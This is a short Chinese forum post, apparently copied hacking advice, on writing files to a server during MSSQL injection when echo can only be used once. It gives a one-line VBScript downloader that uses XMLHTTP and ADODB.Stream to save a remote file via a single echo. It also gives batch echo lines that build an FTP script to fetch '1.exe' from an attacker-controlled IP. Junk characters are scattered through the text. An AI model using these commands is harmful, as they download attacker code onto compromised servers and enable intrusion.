QQ登录

只需要一步,快速开始

 注册地址  找回密码
查看: 2852|回复: 0
打印 上一主题 下一主题

mssql注射时不可以多次echo的解决办法

[复制链接]
字体大小: 正常 放大
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

跳转到指定楼层
1#
发表于 2005-1-23 13:30 |只看该作者 |倒序浏览
|招呼Ta 关注Ta
<>解决办法: + M8 T* b! v2 \% x5 J) B
1.iget.vbs一次写入 6 c8 o6 X6 P# x& T/ g$ d  L
在vbs语句的接触是符号是: 所以我们iget.vbs可以这样写 0 O& c: g3 w2 a3 t( U  Z! I

; U" Y# r: f( p" U" M4 U) sSet x= CreateObject("Microsoft.XMLHTTP"):x.Open "GET",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject("ADODB.Stream"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2
2 k7 j; }; v3 N8 Z1 x
" z" h) K( L% j7 C7 `这样我们可以一次echo成功,echo版本:
; N& z! [' U) _# i& L2 ~1 {* o9 y) R+ \, C
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 &gt;iget.vbs
  n- R9 K. A2 j0 `, e" k7 q6 ?( r* A  ^% v8 T2 ]" S

" U6 ]& i! ~+ D3 h2.bat调用ftp脚本的写法(by envymask)
+ f5 M$ g0 J+ Z; O* O
6 ~/ f0 F+ E( D; H) vecho ftp&gt;1.vbs ' \7 k/ ^  n3 \: m) m. K
echo open ip&gt;2.vbs
0 c4 U* n& c0 a$ F* h: ?echo u&gt;3.vbs $ G1 n2 C6 z" q6 D7 |' z
echo s&gt;4.vbs
( {. W4 [6 K% l4 c9 B* \2 _echo binary&gt;5.vbs
0 q# _, h( m* `! \/ ?8 z) mecho get 1.exe&gt;6.vbs 9 ?( B, V* c: P% @
echo bay&gt;7.vbs 6 `* F6 e+ }4 y7 c- ?1 i1 |5 m) Z& L
, S' v- i( _/ L
copy 1.vbs+2.vbs+3.vbs+4.vbs+5.vbs+6.vbs+7.vbs new.vbs
9 [' A1 @. F: \% w  f9 N</P>
zan
转播转播0 分享淘帖0 分享分享0 收藏收藏0 支持支持0 反对反对0 微信微信
您需要登录后才可以回帖 登录 | 注册地址

qq
收缩
  • 电话咨询

  • 04714969085
fastpost

关于我们| 联系我们| 诚征英才| 对外合作| 产品服务| QQ

手机版|Archiver| |繁體中文 手机客户端  

蒙公网安备 15010502000194号

Powered by Discuz! X2.5   © 2001-2013 数学建模网-数学中国 ( 蒙ICP备14002410号-3 蒙BBS备-0002号 )     论坛法律顾问:王兆丰

GMT+8, 2026-6-11 09:21 , Processed in 0.390360 second(s), 51 queries .

回顶部